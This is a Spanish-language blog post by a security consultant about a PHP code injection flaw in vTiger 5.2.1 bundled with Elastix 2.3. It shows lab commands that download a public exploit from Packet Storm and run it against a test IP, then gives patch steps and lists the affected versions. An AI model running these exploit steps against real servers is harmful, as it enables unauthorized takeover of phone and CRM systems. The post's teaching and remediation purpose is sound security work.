Explotando vulnerabilidad PHP Code Injection Exploit en VTIGER 5.2.1

php-code-inyection

De regreso con las vulnerabilidades en VTIGER, anteriormente habíamos hablado de “Vulnerabilidad de directorios transversales” que afecta hasta implementaciones en Goautodial. En este oportunidad, vamos hablar otra denominada “PHP Code Injection” , el fundamento básico de esta técnica, es inyectar código arbitrario, como lo hace una inyección SQL.

Lo delicado de esto, es que se ha desarrollado un programa a modo de  “exploit” que automatiza este ataque, para tomar el control de una plataforma Elastix primordialmente, que tiene la version de Vtiger vulnerable.

Más adelante, me tomare el tiempo, para explicar como funciona el programa al detalle, por ahora me interesa, mostrar cómo se ejecuta el exploit, cómo funciona cuando es exitoso,  y después como lo parchamos, para que la vulnerabilidad ya no este activa.

Escenario de prueba

Atacante
SO : Kali Linux 32bits
Atacado
SO : Elastix 2.3 recien instalado y sin actualizar

1.-Explotando nuestro sistema y viendo si somos vulnerables.

#apt-get install php5-curl curl
#wget http://packetstormsecurity.com/files/download/119253/elastix23-exec.txt
#mv elastix23-exec.txt elastix.php
#chmod a+wrx elastix.php
#php elastix.php

Nos solicita ingresar la direccion IP del host atacado
Enter Target [https://ip] # https://192.168.10.142

Si el exploit es satifactorio, habremos optenido el acceso como lo muestra el siguiente video

2.- Parchando la vulnerabilidad

Aactualizacion a VTIGET 5.2.1-7
#yum update elastix-vtigercrm

o la que mas me gusta  , Como diria mi abuela , que en paz descanse …. santo remedio hijo !!  😀
#mv /var/www/html/vtigercrm /root/


3.- Condiciones
– Si bien es cierto el “exploit” esta enfocado a Elastix, con algunas modificaciones , puede funcionar para cualquier otra plataforma que user Vtiger.
– Solo afecta a implementaciones de Elastix 2.3 sin Actualizar que contengan Vtiger Crm
– No afecta a Elastix 2.4 , debido a que ya tiene la actualización por default.

Anuncios
Esta entrada fue publicada en Asterisk, Centos, Hacking, Linux por jroliva. Guarda el enlace permanente.

Acerca de jroliva

Juan Oliva, es un consultor de seguridad informática y telefonía IP con 10 años de experiencia en el campo . Muy involucrado en proyectos de pruebas de penetración , análisis y explotación vulnerabilidades, pruebas de ingeniería social, seguridad física, revisión de código, entre otras tareas de seguridad informática. Así mismo, desarrolla proyectos de implementación y mantenimiento de VoIP, basadas en Asterisk y Elastix, proyectos de callcenter, soluciones en la nube y hosted PBX, Aseguramiento de plataformas Linux, Windows. Ha estado trabajando para una variedad de empresas en donde ha desarrollado proyectos para el estado peruano, así como para entidades privadas, nacionales y del extranjero, cuenta con certificaciones vigentes en Ethical hacking, Linux y telefonía IP. Es instructor de cursos de Ethical Hacking y certificaciónes como Linux Professional Institute y Elastix, donde ha tenido oportunidad de realizar capacitaciones en el Perú, así como en el extranjero. Es investigador de vulnerabilidades, y creador de contenidos, que son publicados en su blog personal jroliva.wordpress.com el cual mantiene desde hace mas de 6 años.

2 pensamientos en “Explotando vulnerabilidad PHP Code Injection Exploit en VTIGER 5.2.1

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s